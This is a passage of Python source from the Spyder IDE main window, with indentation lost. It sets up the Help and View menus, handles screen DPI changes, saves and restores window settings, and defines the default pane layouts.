plugin_deps = solve_plugin_dependencies(external_plugins.values())
for plugin_class in plugin_deps:
if issubclass(plugin_class, SpyderPluginV2):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(__docs_url__))
self.register_shortcut(doc_action, "_",
"spyder documentation")
spyder_vid = ("https://www.youtube.com/playlist"
"?list=PLPonohdiDqg9epClEcXoAPUiK0pN5eRoc")
vid_action = create_action(self, _("Tutorial videos"),
icon=ima.icon('VideoIcon'),
triggered=lambda:
programs.start_file(spyder_vid))
#----- Tours
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self, self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
self.help_menu_actions = [
doc_action,
vid_action,
# shortcuts_action,
self.tour_action,
MENU_SEPARATOR,
trouble_action,
report_action, dep_action,
self.check_updates_action,
support_action,
MENU_SEPARATOR,
]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"), self)
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.show_about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus, ClockStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.clock_status = ClockStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_interface_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
self.tabify_plugin(plugin_instance)
plugin_instance.toggle_view(False)
def setup_menus(self):
"""Setup menus."""
# Update menus list
default_menus = [self.file_menu, self.edit_menu, self.search_menu,
self.source_menu, self.run_menu, self.debug_menu,
self.consoles_menu, self.projects_menu,
self.tools_menu, self.view_menu, self.help_menu]
self.menus = self.menus + default_menus
# Show and hide shortcuts and icons in menus for macOS
if sys.platform == 'darwin':
for menu in self.menus:
if menu is not None:
menu.aboutToShow.connect(
lambda menu=menu: self.show_shortcuts(menu))
menu.aboutToHide.connect(
lambda menu=menu: self.hide_shortcuts(menu))
menu.aboutToShow.connect(
lambda menu=menu: set_menu_icons(menu, False))
menu.aboutToShow.connect(self.hide_options_menus)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
regex = re.compile(r'.*_.*_(\d+)[.]log')
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for plugin_id, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status
self.toggle_lock(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor to Kite completions plugin status
self.editor.kite_completions_file_status()
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Setup menus
self.setup_menus()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
if not running_under_pytest():
# This avoids computing missing deps before the window is fully up
timer_report_deps = QTimer(self)
timer_report_deps.setInterval(2000)
timer_report_deps.setSingleShot(True)
timer_report_deps.timeout.connect(
self.report_missing_dependencies)
timer_report_deps.start()
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
self.screen = self.window().windowHandle().screen()
self.current_dpi = self.screen.logicalDotsPerInch()
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, screen):
"""Connect DPI signals for new screen."""
try:
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
except (TypeError, RuntimeError):
# See spyder-ide/spyder#11903 and spyder-ide/spyder#11997
pass
self.screen = screen
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
if self.current_dpi != screen.logicalDotsPerInch():
self.show_dpi_change_message(screen.logicalDotsPerInch())
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
if self.current_dpi == dpi:
# Reconnect DPI scale changes to show a restart message
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
return
if not self.show_dpi_message:
return
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
dismiss_box = QCheckBox(
_("Hide this message during the current session")
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
restart_button = msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.exec_()
if dismiss_box.isChecked():
self.show_dpi_message = False
if msgbox.clickedButton() == restart_button:
# Activate HDPI auto-scaling option since is needed for a proper
# display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Reconnect DPI scale changes to show a restart message
# also update current dpi for future checks
self.current_dpi = dpi
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
@Slot()
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
# Declare dependencies before trying to detect the missing ones
dependencies.declare_dependencies()
missing_deps = dependencies.missing_dependencies()
if missing_deps:
# We change '<br>' by '\n', in order to replace the '<'
# that appear in our deps by '<' (to not break html
# formatting) and finally we restore '<br>' again.
missing_deps = (missing_deps.replace('<br>', '\n').
replace('<', '<').replace('\n', '<br>'))
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""
Load window layout settings from userconfig-based configuration
with `prefix`, under `section`.
Parameters
----------
default: bool
If True, do not restore inner layout.
"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix + 'size')
prefs_dialog_size = get_func(section, prefix + 'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix + 'state', None)
pos = get_func(section, prefix + 'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See spyder-ide/spyder#3748.
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix + 'position')
is_maximized = get_func(section, prefix + 'is_maximized')
is_fullscreen = get_func(section, prefix + 'is_fullscreen')
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def get_window_settings(self):
"""
Return current window settings.
Symmetric to the 'set_window_settings' setter.
"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""
Set window settings.
Symmetric to the 'get_window_settings' accessor.
"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""
Save current window settings with `prefix` in
the userconfig-based configuration, under `section`.
"""
# Use current size and position when saving window settings.
# Fixes spyder-ide/spyder#13882
win_size = self.size()
pos = self.pos()
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix + 'size',
(win_size.width(), win_size.height()))
CONF.set(section, prefix + 'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix + 'is_maximized', self.isMaximized())
CONF.set(section, prefix + 'is_fullscreen', self.isFullScreen())
CONF.set(section, prefix + 'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix + 'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
# Old API
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin._initialize_plugin_in_mainwindow_layout()
except AttributeError:
pass
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin._ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
# Widths have to accumulate to 100 (except if hidden), height per
# column has to accumulate to 100 as well
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [15, # Column 0 width
45, # Column 1 width
5, # Column 2 width
45], # Column 3 width
'height fraction': [[100], # Column 0, row heights
[100], # Column 1, row heights
[100], # Column 2, row heights
[46, 54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [10, # Column 0 width
45, # Column 1 width
45], # Column 2 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45], # Column 1, row heights
[55, 45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [100], # Column 0 width
'height fraction': [[55, 45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[100], # Column 0, row heights
[100]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
# This also seems to help on random cases where the display seems
# 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(
self,
_("Warning"),
_("<b>%s</b> will be overwritten. Do you want to "
"continue?") % name,
QMessageBox.Yes | QMessageBox.No
)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
CONF.set('quick_layouts', 'names', names)
CONF.set('quick_layouts', 'order', order)
CONF.set('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
section = 'quick_layouts'
names = CONF.get(section, 'names')
order = CONF.get(section, 'order')
active = CONF.get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
CONF.set(section, 'names', dlg.names)
CONF.set(section, 'order', dlg.order)
CONF.set(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
